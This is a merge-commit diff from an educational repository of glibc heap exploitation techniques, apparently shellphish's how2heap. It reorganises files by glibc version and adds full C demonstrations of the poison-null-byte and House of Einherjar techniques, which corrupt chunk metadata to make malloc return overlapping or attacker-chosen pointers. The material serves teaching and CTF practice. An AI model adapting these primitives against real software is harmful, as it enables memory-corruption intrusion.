Merge pull request shellphish#81 from shellphish/wip/new_structure

WIP: Introduce structure to account for new consistency checks

Makefile

@@ -1,4 +1,7 @@
-PROGRAMS = fastbin_dup fastbin_dup_into_stack fastbin_dup_consolidate unsafe_unlink house_of_spirit poison_null_byte malloc_playground first_fit house_of_lore overlapping_chunks overlapping_chunks_2 house_of_force unsorted_bin_attack unsorted_bin_into_stack house_of_einherjar house_of_orange
+BASE = fastbin_dup malloc_playground first_fit
+V2.25 = glibc_2.25/fastbin_dup_into_stack glibc_2.25/fastbin_dup_consolidate glibc_2.25/unsafe_unlink glibc_2.25/house_of_spirit glibc_2.25/poison_null_byte glibc_2.25/house_of_lore glibc_2.25/overlapping_chunks glibc_2.25/overlapping_chunks_2 glibc_2.25/house_of_force glibc_2.25/unsorted_bin_attack glibc_2.25/unsorted_bin_into_stack glibc_2.25/house_of_einherjar glibc_2.25/house_of_orange
+V2.26 = glibc_2.26/unsafe_unlink glibc_2.26/poison_null_byte glibc_2.26/house_of_lore glibc_2.26/overlapping_chunks glibc_2.26/unsorted_bin_attack glibc_2.26/unsorted_bin_into_stack glibc_2.26/house_of_einherjar
+PROGRAMS = $(BASE) $(V2.25) $(V2.26)
 CFLAGS += -std=c99 -g
 
 # Convenience to auto-call mcheck before the first malloc()

README.md

@@ -3,24 +3,28 @@
 This repo is for learning various heap exploitation techniques.
 We came up with the idea during a hack meeting, and have implemented the following techniques:
 
-| File | Technique | Applicable CTF Challenges |
-|------|-----------|---------------------------|
-| [first_fit.c](first_fit.c) | Demonstrating glibc malloc's first-fit behavior. | |
-| [fastbin_dup.c](fastbin_dup.c) | Tricking malloc into returning an already-allocated heap pointer by abusing the fastbin freelist. | |
-| [fastbin_dup_into_stack.c](fastbin_dup_into_stack.c) | Tricking malloc into returning a nearly-arbitrary pointer by abusing the fastbin freelist. | [9447-search-engine](https://github.com/ctfs/write-ups-2015/tree/master/9447-ctf-2015/exploitation/search-engine), [0ctf 2017-babyheap](http://uaf.io/exploitation/2017/03/19/0ctf-Quals-2017-BabyHeap2017.html) |
-| [fastbin_dup_consolidate.c](fastbin_dup_consolidate.c) | Tricking malloc into returning an already-allocated heap pointer by putting a pointer on both fastbin freelist and unsorted bin freelist. | [Hitcon 2016 SleepyHolder](https://github.com/mehQQ/public_writeup/tree/master/hitcon2016/SleepyHolder) |
-| [unsafe_unlink.c](unsafe_unlink.c) | Exploiting free on a corrupted chunk to get arbitrary write. | [HITCON CTF 2014-stkof](http://acez.re/ctf-writeup-hitcon-ctf-2014-stkof-or-modern-heap-overflow/), [Insomni'hack 2017-Wheel of Robots](https://gist.github.com/niklasb/074428333b817d2ecb63f7926074427a) |
-| [house_of_spirit.c](house_of_spirit.c) | Frees a fake fastbin chunk to get malloc to return a nearly-arbitrary pointer. | [hack.lu CTF 2014-OREO](https://github.com/ctfs/write-ups-2014/tree/master/hack-lu-ctf-2014/oreo) |
-| [poison_null_byte.c](poison_null_byte.c) | Exploiting a single null byte overflow. | [PlaidCTF 2015-plaiddb](https://github.com/ctfs/write-ups-2015/tree/master/plaidctf-2015/pwnable/plaiddb) |
-| [house_of_lore.c](house_of_lore.c) | Tricking malloc into returning a nearly-arbitrary pointer by abusing the smallbin freelist. | |
-| [overlapping_chunks.c](overlapping_chunks.c) | Exploit the overwrite of a freed chunk size in the unsorted bin in order to make a new allocation overlap with an existing chunk | [hack.lu CTF 2015-bookstore](https://github.com/ctfs/write-ups-2015/tree/master/hack-lu-ctf-2015/exploiting/bookstore), [Nuit du Hack 2016-night-deamonic-heap](https://github.com/ctfs/write-ups-2016/tree/master/nuitduhack-quals-2016/exploit-me/night-deamonic-heap-400) |
-| [overlapping_chunks_2.c](overlapping_chunks_2.c) | Exploit the overwrite of an in use chunk size in order to make a new allocation overlap with an existing chunk  |  |
-| [house_of_force.c](house_of_force.c) | Exploiting the Top Chunk (Wilderness) header in order to get malloc to return a nearly-arbitrary pointer  | [Boston Key Party 2016-cookbook](https://github.com/ctfs/write-ups-2016/tree/master/boston-key-party-2016/pwn/cookbook-6), [BCTF 2016-bcloud](https://github.com/ctfs/write-ups-2016/tree/master/bctf-2016/exploit/bcloud-200) |
-| [unsorted_bin_into_stack.c](unsorted_bin_into_stack.c) | Exploiting the overwrite of a freed chunk on unsorted bin freelist to return a nearly-arbitrary pointer.  |  |
-| [unsorted_bin_attack.c](unsorted_bin_attack.c) | Exploiting the overwrite of a freed chunk on unsorted bin freelist to write a large value into arbitrary address  | [0ctf 2016-zerostorage](https://github.com/ctfs/write-ups-2016/tree/master/0ctf-2016/exploit/zerostorage-6) |
-| [house_of_einherjar.c](house_of_einherjar.c) | Exploiting a single null byte overflow to trick malloc into returning a controlled pointer  | [Seccon 2016-tinypad](https://gist.github.com/hhc0null/4424a2a19a60c7f44e543e32190aaabf) |
-| [house_of_orange.c](house_of_orange.c) | Exploiting the Top Chunk (Wilderness) in order to gain arbitrary code execution   | [Hitcon 2016 houseoforange](https://github.com/ctfs/write-ups-2016/tree/master/hitcon-ctf-2016/pwn/house-of-orange-500) |
-
+| File | Technique | Glibc-Version |Applicable CTF Challenges |
+|------|-----------|---------------|--------------------------|
+| [first_fit.c](first_fit.c) | Demonstrating glibc malloc's first-fit behavior. | | |
+| [fastbin_dup.c](fastbin_dup.c) | Tricking malloc into returning an already-allocated heap pointer by abusing the fastbin freelist. | | |
+| [fastbin_dup_into_stack.c](glibc_2.25/fastbin_dup_into_stack.c) | Tricking malloc into returning a nearly-arbitrary pointer by abusing the fastbin freelist. | latest | [9447-search-engine](https://github.com/ctfs/write-ups-2015/tree/master/9447-ctf-2015/exploitation/search-engine), [0ctf 2017-babyheap](http://uaf.io/exploitation/2017/03/19/0ctf-Quals-2017-BabyHeap2017.html) |
+| [fastbin_dup_consolidate.c](glibc_2.25/fastbin_dup_consolidate.c) | Tricking malloc into returning an already-allocated heap pointer by putting a pointer on both fastbin freelist and unsorted bin freelist. | latest | [Hitcon 2016 SleepyHolder](https://github.com/mehQQ/public_writeup/tree/master/hitcon2016/SleepyHolder) |
+| [unsafe_unlink.c](glibc_2.26/unsafe_unlink.c) | Exploiting free on a corrupted chunk to get arbitrary write. | < 2.26 | [HITCON CTF 2014-stkof](http://acez.re/ctf-writeup-hitcon-ctf-2014-stkof-or-modern-heap-overflow/), [Insomni'hack 2017-Wheel of Robots](https://gist.github.com/niklasb/074428333b817d2ecb63f7926074427a) |
+| [house_of_spirit.c](glibc_2.25/house_of_spirit.c) | Frees a fake fastbin chunk to get malloc to return a nearly-arbitrary pointer. | latest | [hack.lu CTF 2014-OREO](https://github.com/ctfs/write-ups-2014/tree/master/hack-lu-ctf-2014/oreo) |
+| [poison_null_byte.c](glibc_2.26/poison_null_byte.c) | Exploiting a single null byte overflow. | < 2.26 | [PlaidCTF 2015-plaiddb](https://github.com/ctfs/write-ups-2015/tree/master/plaidctf-2015/pwnable/plaiddb) |
+| [house_of_lore.c](glibc_2.26/house_of_lore.c) | Tricking malloc into returning a nearly-arbitrary pointer by abusing the smallbin freelist. | < 2.26 | |
+| [overlapping_chunks.c](glibc_2.26/overlapping_chunks.c) | Exploit the overwrite of a freed chunk size in the unsorted bin in order to make a new allocation overlap with an existing chunk | < 2.26 | [hack.lu CTF 2015-bookstore](https://github.com/ctfs/write-ups-2015/tree/master/hack-lu-ctf-2015/exploiting/bookstore), [Nuit du Hack 2016-night-deamonic-heap](https://github.com/ctfs/write-ups-2016/tree/master/nuitduhack-quals-2016/exploit-me/night-deamonic-heap-400) |
+| [overlapping_chunks_2.c](glibc_2.25/overlapping_chunks_2.c) | Exploit the overwrite of an in use chunk size in order to make a new allocation overlap with an existing chunk  | latest | |
+| [house_of_force.c](glibc_2.25/house_of_force.c) | Exploiting the Top Chunk (Wilderness) header in order to get malloc to return a nearly-arbitrary pointer | latest | [Boston Key Party 2016-cookbook](https://github.com/ctfs/write-ups-2016/tree/master/boston-key-party-2016/pwn/cookbook-6), [BCTF 2016-bcloud](https://github.com/ctfs/write-ups-2016/tree/master/bctf-2016/exploit/bcloud-200) |
+| [unsorted_bin_into_stack.c](glibc_2.26/unsorted_bin_into_stack.c) | Exploiting the overwrite of a freed chunk on unsorted bin freelist to return a nearly-arbitrary pointer.  | < 2.26 | |
+| [unsorted_bin_attack.c](glibc_2.26/unsorted_bin_attack.c) | Exploiting the overwrite of a freed chunk on unsorted bin freelist to write a large value into arbitrary address  | < 2.26 | [0ctf 2016-zerostorage](https://github.com/ctfs/write-ups-2016/tree/master/0ctf-2016/exploit/zerostorage-6) |
+| [house_of_einherjar.c](glibc_2.26/house_of_einherjar.c) | Exploiting a single null byte overflow to trick malloc into returning a controlled pointer  | < 2.26 | [Seccon 2016-tinypad](https://gist.github.com/hhc0null/4424a2a19a60c7f44e543e32190aaabf) |
+| [house_of_orange.c](glibc_2.25/house_of_orange.c) | Exploiting the Top Chunk (Wilderness) in order to gain arbitrary code execution  | < 2.26 | [Hitcon 2016 houseoforange](https://github.com/ctfs/write-ups-2016/tree/master/hitcon-ctf-2016/pwn/house-of-orange-500) |
+
+The GnuLibc is under constant development and several of the techniques above have let to consistency checks introduced in the malloc/free logic.
+Consequently, these checks regularly break some of the techniques and require adjustments to bypass them (if possible).
+We address this issue by keeping multiple versions of the same technique for each Glibc-release that required an adjustment.
+The structure is `glibc_<version>/technique.c`.
 
 Have a good example?
 Add it here!

glibc_2.25/poison_null_byte.c

@@ -0,0 +1,84 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <malloc.h>
+
+
+int main()
+{
+	fprintf(stderr, "Welcome to poison null byte 2.0!\n");
+	fprintf(stderr, "Tested in Ubuntu 14.04 64bit.\n");
+	fprintf(stderr, "This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");
+
+	uint8_t* a;
+	uint8_t* b;
+	uint8_t* c;
+	uint8_t* b1;
+	uint8_t* b2;
+	uint8_t* d;
+
+	fprintf(stderr, "We allocate 0x100 bytes for 'a'.\n");
+	a = (uint8_t*) malloc(0x100);
+	fprintf(stderr, "a: %p\n", a);
+	int real_a_size = malloc_usable_size(a);
+	fprintf(stderr, "Since we want to overflow 'a', we need to know the 'real' size of 'a' "
+		"(it may be more than 0x100 because of rounding): %#x\n", real_a_size);
+
+	/* chunk size attribute cannot have a least significant byte with a value of 0x00.
+	 * the least significant byte of this will be 0x10, because the size of the chunk includes
+	 * the amount requested plus some amount required for the metadata. */
+	b = (uint8_t*) malloc(0x200);
+
+	fprintf(stderr, "b: %p\n", b);
+
+	c = (uint8_t*) malloc(0x100);
+	fprintf(stderr, "c: %p\n", c);
+
+	uint64_t* b_size_ptr = (uint64_t*)(b - 8);
+
+	// this technique works by overwriting the size metadata of a free chunk
+	free(b);
+
+	fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
+	fprintf(stderr, "b.size is: (0x200 + 0x10) | prev_in_use\n");
+	fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
+	a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG"
+	fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
+
+	uint64_t* c_prev_size_ptr = ((uint64_t*)c)-2;
+	fprintf(stderr, "c.prev_size is %#lx\n",*c_prev_size_ptr);
+
+	b1 = malloc(0x100);
+
+	fprintf(stderr, "b1: %p\n",b1);
+	fprintf(stderr, "Now we malloc 'b1'. It will be placed where 'b' was. "
+		"At this point c.prev_size should have been updated, but it was not: %lx\n",*c_prev_size_ptr);
+	fprintf(stderr, "Interestingly, the updated value of c.prev_size has been written 0x10 bytes "
+		"before c.prev_size: %lx\n",*(((uint64_t*)c)-4));
+	fprintf(stderr, "We malloc 'b2', our 'victim' chunk.\n");
+	// Typically b2 (the victim) will be a structure with valuable pointers that we want to control
+
+	b2 = malloc(0x80);
+	fprintf(stderr, "b2: %p\n",b2);
+
+	memset(b2,'B',0x80);
+	fprintf(stderr, "Current b2 content:\n%s\n",b2);
+
+	fprintf(stderr, "Now we free 'b1' and 'c': this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");
+
+	free(b1);
+	free(c);
+
+	fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2'.\n");
+	d = malloc(0x300);
+	fprintf(stderr, "d: %p\n",d);
+
+	fprintf(stderr, "Now 'd' and 'b2' overlap.\n");
+	memset(d,'D',0x300);
+
+	fprintf(stderr, "New b2 content:\n%s\n",b2);
+
+	fprintf(stderr, "Thanks to http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf "
+		"for the clear explanation of this technique.\n");
+}

unsafe_unlink.c → glibc_2.25/unsafe_unlink.c

@@ -32,18 +32,6 @@ int main()
 	fprintf(stderr, "Fake chunk fd: %p\n",(void*) chunk0_ptr[2]);
 	fprintf(stderr, "Fake chunk bk: %p\n\n",(void*) chunk0_ptr[3]);
 
-	fprintf(stderr, "We need to make sure the 'size' of our fake chunk matches the 'previous_size' of the next chunk (chunk+size)\n");
-	fprintf(stderr, "With this setup we can pass this check: (chunksize(P) != prev_size (next_chunk(P)) == False\n");
-	fprintf(stderr, "P = chunk0_ptr, next_chunk(P) == (mchunkptr) (((char *) (p)) + chunksize (p)) == chunk0_ptr + (chunk0_ptr[1]&(~ 0x7))\n");
-	fprintf(stderr, "If x = chunk0_ptr[1] & (~ 0x7), that is x = *(chunk0_ptr + x).\n");
-	fprintf(stderr, "We just need to set the *(chunk0_ptr + x) = x, so we can pass the check\n");
-	fprintf(stderr, "1.Now the x = chunk0_ptr[1]&(~0x7) = 0, we should set the *(chunk0_ptr + 0) = 0, in other words we should do nothing\n");
-	fprintf(stderr, "2.Further more we set chunk0_ptr = 0x8 in 64-bits environment, then *(chunk0_ptr + 0x8) == chunk0_ptr[1], it's fine to pass\n");
-	fprintf(stderr, "3.Finally we can also set chunk0_ptr[1] = x in 64-bits env, and set *(chunk0_ptr+x)=x,for example chunk_ptr0[1] = 0x20, chunk_ptr0[4] = 0x20\n");
-	chunk0_ptr[1] = sizeof(size_t);
-	fprintf(stderr, "In this case we set the 'size' of our fake chunk so that chunk0_ptr + size (%p) == chunk0_ptr->size (%p)\n", ((char *)chunk0_ptr + chunk0_ptr[1]), &chunk0_ptr[1]);
-	fprintf(stderr, "You can find the commitdiff of this check at https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=17f487b7afa7cd6c316040f3e6c86dc96b2eec30\n\n");
-
 	fprintf(stderr, "We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n");
 	uint64_t *chunk1_hdr = chunk1_ptr - header_size;
 	fprintf(stderr, "We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n");

glibc_2.26/house_of_einherjar.c

@@ -0,0 +1,107 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <malloc.h>
+
+/*
+   Credit to st4g3r for publishing this technique
+   The House of Enherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc()
+   This technique may result in a more powerful primitive than the Poison Null Byte, but it has the additional requirement of a heap leak. 
+*/
+
+int main()
+{
+	fprintf(stderr, "Welcome to House of Einherjar!\n");
+	fprintf(stderr, "Tested in Ubuntu 16.04 64bit.\n");
+	fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");
+	fprintf(stderr, "This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");
+
+	uint8_t* a;
+	uint8_t* b;
+	uint8_t* d;
+
+	fprintf(stderr, "\nWe allocate 0x38 bytes for 'a'\n");
+	a = (uint8_t*) malloc(0x38);
+	fprintf(stderr, "a: %p\n", a);
+
+    int real_a_size = malloc_usable_size(a);
+    fprintf(stderr, "Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);
+
+    // create a fake chunk
+    fprintf(stderr, "\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");
+    fprintf(stderr, "However, you can also create the chunk in the heap or the bss, as long as you know its address\n");
+    fprintf(stderr, "We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");
+    fprintf(stderr, "(although we could do the unsafe unlink technique here in some scenarios)\n");
+
+    size_t fake_chunk[6];
+
+    fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
+    fake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small bin
+    fake_chunk[2] = (size_t) fake_chunk; // fwd
+    fake_chunk[3] = (size_t) fake_chunk; // bck
+    fake_chunk[4] = (size_t) fake_chunk; //fwd_nextsize
+    fake_chunk[5] = (size_t) fake_chunk; //bck_nextsize
+
+
+    fprintf(stderr, "Our fake chunk at %p looks like:\n", fake_chunk);
+    fprintf(stderr, "prev_size (not used): %#lx\n", fake_chunk[0]);
+    fprintf(stderr, "size: %#lx\n", fake_chunk[1]);
+    fprintf(stderr, "fwd: %#lx\n", fake_chunk[2]);
+    fprintf(stderr, "bck: %#lx\n", fake_chunk[3]);
+    fprintf(stderr, "fwd_nextsize: %#lx\n", fake_chunk[4]);
+    fprintf(stderr, "bck_nextsize: %#lx\n", fake_chunk[5]);
+
+	/* In this case it is easier if the chunk size attribute has a least significant byte with
+	 * a value of 0x00. The least significant byte of this will be 0x00, because the size of 
+	 * the chunk includes the amount requested plus some amount required for the metadata. */
+	b = (uint8_t*) malloc(0xf8);
+    int real_b_size = malloc_usable_size(b);
+
+	fprintf(stderr, "\nWe allocate 0xf8 bytes for 'b'.\n");
+	fprintf(stderr, "b: %p\n", b);
+
+	uint64_t* b_size_ptr = (uint64_t*)(b - 8);
+    /* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit*/
+
+	fprintf(stderr, "\nb.size: %#lx\n", *b_size_ptr);
+	fprintf(stderr, "b.size is: (0x100) | prev_inuse = 0x101\n");
+	fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
+	a[real_a_size] = 0; 
+	fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
+    fprintf(stderr, "This is easiest if b.size is a multiple of 0x100 so you "
+           "don't change the size of b, only its prev_inuse bit\n");
+    fprintf(stderr, "If it had been modified, we would need a fake chunk inside "
+           "b where it will try to consolidate the next chunk\n");
+
+    // Write a fake prev_size to the end of a
+    fprintf(stderr, "\nWe write a fake prev_size to the last %lu bytes of a so that "
+           "it will consolidate with our fake chunk\n", sizeof(size_t));
+    size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
+    fprintf(stderr, "Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
+    *(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;
+
+    //Change the fake chunk's size to reflect b's new prev_size
+    fprintf(stderr, "\nModify fake chunk's size to reflect b's new prev_size\n");
+    fake_chunk[1] = fake_size;
+
+    // free b and it will consolidate with our fake chunk
+    fprintf(stderr, "Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");
+    free(b);
+    fprintf(stderr, "Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);
+
+    //if we allocate another chunk before we free b we will need to 
+    //do two things: 
+    //1) We will need to adjust the size of our fake chunk so that
+    //fake_chunk + fake_chunk's size points to an area we control
+    //2) we will need to write the size of our fake chunk
+    //at the location we control. 
+    //After doing these two things, when unlink gets called, our fake chunk will
+    //pass the size(P) == prev_size(next_chunk(P)) test. 
+    //otherwise we need to make sure that our fake chunk is up against the
+    //wilderness
+
+    fprintf(stderr, "\nNow we can call malloc() and it will begin in our fake chunk\n");
+    d = malloc(0x200);
+    fprintf(stderr, "Next malloc(0x200) is at %p\n", d);
+}